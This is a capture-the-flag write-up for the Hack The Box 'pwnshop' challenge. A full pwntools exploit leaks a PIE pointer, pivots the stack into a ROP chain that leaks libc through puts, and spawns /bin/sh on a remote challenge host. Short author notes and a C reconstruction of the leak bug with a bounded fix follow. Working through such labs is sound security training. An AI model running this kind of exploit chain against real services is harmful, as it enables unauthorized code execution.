HTB pwnshop

Author: clive0x | Published 2021-08-07 11:40

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template --host 167.99.88.212 --port 31369 space
from pwn import *
from pwnlib import libcdb  # pulled in by the template; not used below

# Set up pwntools for the correct architecture
exe = context.binary = ELF('/root/hackthebox/tracker/pwnshop')

# Many built-in settings can be controlled on the command-line and show up
# in "args".  For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
# ./exploit.py GDB HOST=example.com PORT=4141
host = args.HOST or '46.101.23.188'
port = int(args.PORT or 30327)

def local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)

def remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = connect(host, port)
    if args.GDB:
        gdb.attach(io, gdbscript=gdbscript)
    return io

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.LOCAL:
        return local(argv, *a, **kw)
    else:
        return remote(argv, *a, **kw)

def leakdataaddr():
    '''Menu option 2 (the "sell?" prompt): fill the 8-byte field completely,
    so the following "%s" keeps printing past it and leaks a pointer into
    the binary's data segment.'''
    io.sendlineafter(b"> ", b"2")
    io.sendlineafter(b"sell? ", b'zzq')
    io.sendafter(b"it? ", b'11111111')   # send(), not sendline(): no trailing \n
    ret = io.recvline()
    # what? 11111111<leaked bytes>?
    start = 14                           # len("what? 11111111")
    end = ret.index(b'?', start)         # the leak runs up to the next '?'
    addr = ret[start:end]
    addr_int = int.from_bytes(addr, byteorder='little')
    data_segment = addr_int - 0xc0
    print(hex(data_segment))
    return data_segment

def leakputsaddr():
    '''Menu option 1 (the "details:" prompt): only the saved return address
    can be overwritten, so it gets the "sub rsp, 0x28 ; ret" gadget, which
    moves rsp back onto the chain placed at offset 0x28 of the buffer.
    The chain prints puts@got and returns to the main loop.'''
    io.sendlineafter(b"> ", b"1")
    payload = b'a'*0x28
    payload += p64(pop_rdi_ret)
    payload += p64(puts_got)
    payload += p64(puts_plt)
    payload += p64(loop_addr)
    payload += p64(sub_rsp_ret)          # lands in the saved return address
    io.sendafter(b"details: ", payload)  # send(): an extra \n corrupts the leak
    ret = io.recvline()
    ret = ret[0:-1]                      # strip the newline printed by puts
    puts_addr = int.from_bytes(ret, byteorder='little', signed=False)
    print(hex(puts_addr))
    return puts_addr

def getshell():
    '''Same pivot again, this time calling system("/bin/sh").'''
    io.sendlineafter(b"> ", b"1")
    payload = b'a'*0x28
    payload += p64(pop_rdi_ret)
    payload += p64(str_binsh_addr)
    payload += p64(system_addr)
    payload += b'a'*0x8
    payload += p64(sub_rsp_ret)
    io.sendlineafter(b"details: ", payload)
    sleep(1)
    io.interactive()
    print('aa')

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
# Checksec lines below were emitted when the template was generated for a
# different binary ("space"); the exploit itself treats pwnshop as a
# 64-bit PIE executable (p64 chains, base computed from a leak).
# Arch:    i386-32-little
# RELRO:    No RELRO
# Stack:    No canary found
# NX:      NX disabled
# PIE:      No PIE (0x8048000)
# RWX:      Has RWX segments

io = start()

# Leak a data-segment pointer and derive the PIE base from it
data_addr = leakdataaddr()
entry_addr = data_addr - 0x4000
exe.address = entry_addr

main_addr = 0x10A0 + entry_addr
buy_addr = 0x132A + entry_addr
loop_addr = 0x10BD + entry_addr
# sub rsp, 0x28 ; ret
sub_rsp_ret = 0x1219 + entry_addr
pop_rdi_ret = 0x13c3 + entry_addr
puts_plt = exe.plt['puts']
puts_got = exe.got['puts']

# Leak puts@libc, then resolve libc base, system and "/bin/sh"
puts_addr = leakputsaddr()
puts_offset = 0x6f6a0
libc_addr = puts_addr - puts_offset
system_addr = 0x453a0 + libc_addr
str_binsh_addr = 0x18ce17 + libc_addr

getshell()
```

This challenge is not that hard, but it exposed some gaps in my knowledge.

Only the buy() function gives an 8-byte overwrite of the return address, a single slot, so the ROP chain cannot be written directly onto the stack.

1. ROPgadget: with --only 'sub|ret' it does not find the sub rsp, xxx gadgets; without --only it returns all gadgets by default.

2. I first wanted to use ret2dlresolve and write the dlresolve structures into the data segment, but then found the payload was 0x50 bytes while the code only allows writing 0x40.

3. Once again the confusion between sendline() and send(): leakputsaddr() wrote one extra \n, which made getshell() receive the wrong bytes.
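The leak that leakdataaddr() parses, reconstructed here as an added example that is neither the writeup's code nor the pwnshop binary: a field filled with exactly 8 bytes and no terminator, printed later with "%s", exposes the pointer stored behind it up to its first zero byte, and a precision-bounded print closes the hole. The struct layout, the "what? " prompt and the pointer value are assumptions, and the demo assumes a little-endian (x86-64) host.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical reconstruction (not the pwnshop binary) of the bug class that
 * leakdataaddr() relies on: an 8-byte field receives exactly 8 bytes, is never
 * NUL-terminated, and a later "%s" keeps printing into the field behind it. */
#define NAME_LEN 8

struct item {
    char name[NAME_LEN];  /* exactly NAME_LEN bytes, no terminator */
    uint64_t next;        /* pointer-sized field stored right after the name */
};

/* Vulnerable echo: "%s" runs past name until the first zero byte.  The struct
 * is read through a char pointer so the walk stays inside one object. */
static int echo_vulnerable(const struct item *it, char *out, size_t outlen) {
    return snprintf(out, outlen, "what? %s?", (const char *)it);
}

/* Hardened echo: the precision bounds the read to the field itself. */
static int echo_hardened(const struct item *it, char *out, size_t outlen) {
    return snprintf(out, outlen, "what? %.*s?", NAME_LEN, it->name);
}

/* Rebuild a little-endian pointer from the bytes after the name, the way
 * int.from_bytes(addr, 'little') does in the exploit; 0 means nothing leaked. */
static uint64_t pointer_from_leak(const char *line, size_t name_offset) {
    const char *p = line + name_offset + NAME_LEN;
    const char *end = strchr(p, '?');   /* the leak ends at the trailing '?' */
    uint64_t v = 0;
    for (size_t i = 0; end && p + i < end && i < 8; i++)
        v |= (uint64_t)(unsigned char)p[i] << (8 * i);
    return v;
}

/* Constructed pointer value; its low byte is non-zero, like the writeup's
 * leak (which ends in 0xc0), so "%s" does not stop early. */
static const uint64_t DEMO_PTR = 0x55d1c0ffe0c0ULL;

/* Run one echo variant on constructed input and return what leaked. */
static uint64_t leaked_pointer(int hardened) {
    struct item it;
    char line[64];
    memcpy(it.name, "11111111", NAME_LEN);  /* 8 bytes, like the exploit sends */
    it.next = DEMO_PTR;                     /* assumes little-endian byte order */
    if (hardened) echo_hardened(&it, line, sizeof line);
    else echo_vulnerable(&it, line, sizeof line);
    return pointer_from_leak(line, strlen("what? "));
}
```

leaked_pointer(0) recovers the full constructed pointer from the echoed line, while leaked_pointer(1) gets nothing because the output stops at the 8-byte field.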

Article link: https://www.haomeiwen.com/subject/mzwwvltx.html